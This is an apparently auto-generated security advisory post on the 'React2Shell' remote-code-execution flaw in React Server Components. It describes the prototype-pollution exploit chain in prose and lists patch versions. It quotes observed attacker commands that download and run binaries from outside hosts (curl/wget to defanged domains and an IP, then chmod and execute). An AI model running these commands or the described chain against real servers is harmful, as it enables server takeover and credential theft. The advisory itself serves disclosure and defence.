Listen to this Post
The critical vulnerability, known as React2Shell, resides in the insecure deserialization of the React Flight protocol used by React Server Components (RSC). The flaw is in the `reviveModel` function within ReactFlightReplyServer.js, which fails to properly validate if object properties belong to the object itself or are inherited from its prototype. An attacker can craft a malicious serialized payload where a chunk references itself using the `$@` prefix, creating a loop. By controlling an object’s `hasOwnProperty` method, the attacker bypasses security checks and gains access to the JavaScript prototype chain, traversing from `__proto__` to the `Function` constructor.
The exploit involves a four-stage chain. First, a self-referencing loop exposes internal React objects. Second, the attacker sets a `then` property on a chunk, tricking JavaScript’s `await` into automatically executing attacker-controlled code by calling React’s internal `initializeModelChunk` function. Third, the malicious chunk, with a status of “resolved_model”, feeds a crafted payload into the initialization process. Finally, execution is achieved by abusing the `$B` (Blob) prefix handler. The attacker points the `_formData.get` method to the `Function` constructor, causing the server to execute an arbitrary string as JavaScript code with Node.js privileges. This allows a single unauthenticated HTTP request to achieve remote code execution on the server.
dailycve form:
Platform: React/Next.js Ecosystem
Version: 19.0.0-19.2.0
Vulnerability: Remote Code Execution
Severity: Critical (10.0)
date: 2025-12-03
Prediction: 2025-12-11
What Undercode Say:
Analytics
- Widespread exploitation observed within days of disclosure by cyber crime and espionage groups.
- Common post-exploitation payloads include MINOCAT tunneler, SNOWLIGHT downloader, HISONIC/COMPOOD backdoors, and XMRig cryptocurrency miners.
- Attackers harvest cloud credentials (AWS, Azure, GCP) and deploy secret discovery tools like TruffleHog.
Bash commands and codes related to the blog
– `curl -fsSL -m180 reactcdn.windowserrorapis[.]com:443/?h=… -o
– `wget http://45.76.155[.]14/vim -O /tmp/vim`
– `cd /tmp; wget hxxp://gfxnick[.]emerald[.]usbx[.]me/bot; chmod 777 bot; ./bot…`
How Exploit:
- Exploit chains abuse prototype pollution via self-referencing Flight protocol chunks.
- Attackers hijack `then` property to trigger malicious code execution during deserialization.
- The `$B` blob handler is weaponized to call the `Function` constructor with attacker-controlled strings.
Protection from this CVE
- Patch immediately to React 19.0.1, 19.1.2, 19.2.1 or higher; or Next.js 15.0.5, 16.0.7 or higher.
- Use the official tool:
npx fix-react2shell-next. - Apply Web Application Firewall (WAF) rules to block exploit patterns.
- Rotate all application secrets and environment variables post-patch.
Impact:
- Full server compromise allowing arbitrary command execution.
- Theft of sensitive data, API keys, and cloud credentials.
- Deployment of persistent backdoors, tunnels, and cryptominers.
- Disruption via Denial-of-Service from related CVEs (CVE-2025-55184, CVE-2025-67779).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

